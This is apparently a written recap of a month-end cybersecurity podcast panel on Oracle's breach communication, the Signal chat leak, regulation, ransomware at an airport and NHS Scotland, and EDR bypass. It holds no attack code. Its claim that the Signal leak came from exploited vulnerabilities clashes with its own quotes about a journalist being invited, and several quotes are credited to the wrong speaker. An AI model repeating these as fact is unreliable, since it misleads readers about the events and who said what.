Cybersecurity Today: Month-End Review Summary
Release Date: April 5, 2025
Host: Jim Love
Guests: Dana Proctor (Ottawa), Randy Rose (Center for Internet Security, Saratoga Springs), David Shipley (Fredericton)
1. Introduction
In the April 5, 2025 episode of Cybersecurity Today, host Jim Love convenes a panel comprising Dana Proctor from Ottawa, Randy Rose from the Center for Internet Security in Saratoga Springs, and the ever-present David Shipley from Fredericton. The discussion focuses on major cybersecurity events of the month, evaluating breaches, communication mishaps, and evolving global regulations.
2. Oracle Breach: A Case Study in Poor Incident Communication
David Shipley initiates the conversation with a critique of Oracle’s handling of a recent security breach:
[01:33] David Shipley: "Breaches happen even to the big kids. It's important to be honest when it happens because the speculation, the rumor mill, the register, savage headlines on the reg, they're just not worth dancing around."
Incident Overview: A hacking group claimed to have breached Oracle Cloud Classic, not the primary Oracle Cloud service. Initially, Oracle denied the breach, but contradictions arose when the hackers demonstrated their access by placing messages on Oracle servers.
Discussion Highlights:
-
Transparency Failure: Randy Rose emphasizes the critical role of communication during breaches.
[04:11] Jim Love: "But in cybersecurity, if you're not candid, you're gonna do have more pain in the long run than you do by just putting this out."
-
Broader Implications: Dana Proctor underscores the long-term damage to Oracle's trustworthiness due to mishandled communications.
[09:09] Dana Proctor: "Breaches do have a way of bringing our businesses, if not our future trajectory down significantly."
-
Rebuilding Trust: David Shipley notes that while breaches can be detrimental, organizations like CrowdStrike have successfully rebuilt trust post-incident by transparently addressing issues.
[09:41] David Shipley: "You can actually rebuild trust through an incident. It's not ideal, but you can."
3. Signal Group Chat Incident: Government’s Security Oversight
Jim Love transitions to discussing a notable security lapse involving Signal, an encrypted messaging app widely trusted for secure communications.
Incident Overview: Several U.S. Government officials used Signal for sensitive communications, believing it to be fully secure. However, vulnerabilities were exploited, allowing unauthorized parties to access conversations.
Key Points Discussed:
-
Misplaced Trust in Technology: David Shipley criticizes the assumption that using encrypted apps like Signal inherently ensures security.
[10:13] Jim Love: "You have encrypted communication there. Only you got to make sure you don't invite the wrong people to that..."
-
Government Policy Failures: Randy Rose explains the complexities of data classification and the importance of adhering to need-to-know principles even when using secure channels.
[16:14] Randy Rose: "When you move something out of official IT channels, you've lost control over who can get that."
-
Cultural Norms and Leadership: The panel emphasizes that technological solutions alone are insufficient; organizational culture and leadership commitment are paramount.
[19:27] Randy Rose: "When there's a breach, understand what it is, what's going on, who's impacted, how do we resolve that issue."
-
Consequences and Accountability: Dana Proctor expresses frustration over the lack of accountability and the excuses provided by officials regarding the breach.
[17:41] Dana Proctor: "The telling me that it was okay that this journalist was in that chat was just an offense on my intelligence."
4. Global Cybersecurity Regulations: UK’s Progressive Steps vs. Canada’s Struggles
The conversation shifts to global cybersecurity regulatory environments, particularly contrasting the United Kingdom’s proactive measures with Canada’s lagging efforts.
UK’s Legislative Advances: David Shipley highlights the UK's introduction of new legislation targeting data centers and Managed Service Providers (MSPs), recognizing these entities as critical to the digital economy.
[20:03] David Shipley: "The UK government take a really nice leadership role globally in new legislation being proposed to actually extend critical infrastructure cybersecurity."
Challenges in Canada: Dana Proctor laments Canada's delayed and insufficient regulatory framework, despite significant investments in certification programs.
[23:04] Dana Proctor: "But we still can't get regulations or bills through to say what our telecommunications or our nuclear power plants should be required to do."
Role of MSPs: Randy Rose elaborates on the importance of regulating MSPs, which often serve small organizations lacking robust internal cybersecurity measures.
[24:58] Randy Rose: "Having regulations that support those organizations is one of the best ways to get to those organizations that are traditionally really hard to get to."
Historical Context: The panel reflects on previous initiatives like Canada's version of Cyber Essentials, noting its failure due to lack of enforcement compared to the UK's success where government RFPs mandated compliance.
[28:42] David Shipley: "Cyber Essentials was more successful in the UK because you couldn't get a government RFP if you didn't have the basic bare minimum."
5. Recent Cybersecurity Incidents: Kuala Lumpur Airport and NHS Scotland
Kuala Lumpur International Airport Ransomware Attack: Dana Proctor discusses a $10 million ransomware attack on the airport, focusing on the convergence of Operational Technology (OT) with Information Technology (IT), which exposed critical flight information systems.
[39:25] Dana Proctor: "They had whiteboards in the Kuala Lumpur International Airport... targeting what used to be physically separate fiber networks into the same network."
NHS Scotland Ransomware Attack: The panel examines a severe ransomware incident that crippled most clinical systems, forcing staff to revert to pen and paper operations for over a day without effective incident response plans.
[40:06] Dana Proctor: "Patient care wasn't able to go on... no segmentation for offsite backups... they had no incident response plan."
Implications: These incidents illustrate the devastating impact of ransomware on critical infrastructure and the urgent need for robust cybersecurity measures and preparedness.
6. EDR Bypass and Endpoint Security Challenges
Jim Love introduces a discussion on the sophistication of recent Endpoint Detection and Response (EDR) bypass techniques, highlighting their threat to small businesses.
Technical Insights: Randy Rose explains that while EDR systems are essential, their effectiveness is contingent on proper tuning and configuration to detect novel attack vectors like “living off the land” binaries.
[36:26] Randy Rose: "EDR isn't brand new, but some of the techniques that we're seeing are pretty novel and interesting."
Panel Concerns: Dana Proctor and David Shipley emphasize that many organizations treat EDR as a “set and forget” solution, neglecting continuous monitoring and testing, which diminishes their efficacy.
[37:47] Dana Proctor: "We need to be testing, we need to be actually running some semblance of penetration testing..."
[37:59] David Shipley: "When we hear vendors say that sweet siren song of it's automated, smart, intelligent, you don't have to do anything, it is the disaster of the sirens."
7. Law Enforcement and Cybercrime: Arrest of a Canadian Hacker
The panel touches on the recent arrest of a Canadian individual implicated in hacking the Texas GOP, highlighting the challenges and successes in international cyber law enforcement.
[44:19] Dana Proctor: "One of the best environmental campaigns ever. But also, do not taunt the FBI with foul language and tell them what they can and can't do."
Discussion Points:
- Jurisdictional Challenges: Randy Rose notes the difficulties in international law enforcement coordination, though this particular arrest marks a victory.
[45:13] Jim Love: "I keep looking at this... it's incredibly hard to get through the communications people from police who will actually talk to you."
- Deterrence: The panel agrees that persistent efforts by authorities like the FBI serve as a deterrent against cybercriminal activities.
8. Positive Developments: Integrating Anti-Money Laundering with Cybersecurity
Dana Proctor highlights the integration of Anti-Money Laundering (AML) initiatives with cybersecurity frameworks, fostering more robust detection and prevention mechanisms against financial cybercrimes.
[46:23] Dana Proctor: "Anti money laundering, anti fraud, cybersecurity, they're all very close cousins."
Benefits: Such integration enhances the ability to detect and thwart illicit financial activities, particularly those targeting vulnerable populations like seniors and individuals with disabilities.
9. Conclusion and Reflections
Jim Love wraps up the episode by reflecting on the rapid passage of time during the discussion and expressing gratitude to the panelists for their insightful contributions. He encourages listeners to engage via email or LinkedIn for further discussions on cybersecurity topics.
[47:23] Jim Love: "Thank you very much and thanks for listening... we'll do this again next month."
Key Takeaways
-
Transparency and Honesty: Effective communication during breaches can mitigate long-term damage to an organization’s reputation.
-
Regulatory Enforcement: Strong, enforced regulations, as exemplified by the UK, are crucial in enhancing cybersecurity across all sectors.
-
Continuous Vigilance: EDR systems require regular tuning and testing to remain effective against evolving cyber threats.
-
Law Enforcement Collaboration: International cooperation is essential in combating cybercrime, with recent arrests highlighting progress.
-
Integrated Approaches: Combining AML with cybersecurity efforts strengthens overall defense mechanisms against financial cyber threats.
For more detailed discussions and updates, subscribe to Cybersecurity Today and follow Jim Love on LinkedIn.
